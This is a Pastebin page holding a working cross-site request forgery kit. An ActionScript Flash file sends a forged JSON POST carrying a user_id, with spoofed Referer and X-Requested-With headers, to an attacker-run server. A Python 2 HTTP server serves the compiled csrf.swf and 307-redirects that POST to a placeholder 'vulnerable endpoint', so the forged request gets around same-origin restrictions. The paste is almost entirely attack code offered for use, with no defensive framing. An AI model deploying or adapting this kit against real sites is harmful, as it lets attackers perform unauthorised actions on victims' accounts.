Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- package
- {
- import flash.display.Sprite;
- import flash.net.URLLoader;
- import flash.net.URLRequest;
- import flash.net.URLRequestHeader;
- import flash.net.URLRequestMethod;
- public class csrf extends Sprite
- {
- public function csrf()
- {
- super();
- var member1:Object = null;
- var myJson:String = null;
- member1 = new Object();
- member1 = {
- "user_id":36427093
- };
- var myData:Object = member1;
- myJson = JSON.stringify(myData);
- var url:String = "http://my-server:8000/";
- var request:URLRequest = new URLRequest(url);
- request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json;charset=utf-8"));
- request.requestHeaders.push(new URLRequestHeader("Referer","https://some-vulnerable-endpoint"));
- request.requestHeaders.push(new URLRequestHeader("X-Requested-With","https://some-vulnerable-endpoint"));
- request.data = myJson;
- request.method = URLRequestMethod.POST;
- var urlLoader:URLLoader = new URLLoader();
- try
- {
- urlLoader.load(request);
- return;
- }
- catch(e:Error)
- {
- trace(e);
- return;
- }
- }
- }
- }
- import BaseHTTPServer
- import time
- import sys
- HOST = ''
- PORT = 8000
- vulnerable_endpoint="https://some-vulnerable-endpoint-here"
- class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
- def do_POST(s):
- if s.path == '/csrf.swf':
- s.send_response(200)
- s.send_header("Content-Type","application/x-shockwave-flash")
- s.end_headers()
- s.wfile.write(open("csrf.swf", "rb").read()) # csrf.swf is the filename you compiled the above actionscript to
- return
- s.send_response(307)
- s.send_header("Location", vulnerable_endpoint)
- s.end_headers()
- def do_GET(s):
- print(s.path)
- s.do_POST()
- if __name__ == '__main__':
- server_class = BaseHTTPServer.HTTPServer
- httpd = server_class((HOST,PORT), RedirectHandler)
- print time.asctime(),"Server Starts - %s:%s" % (HOST,PORT)
- try:
- httpd.serve_forever()
- except KeyboardInterrupt:
- pass
- httpd.server_close()
- print time.asctime(),"Server Stops - %s:%s" % (HOST,PORT)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement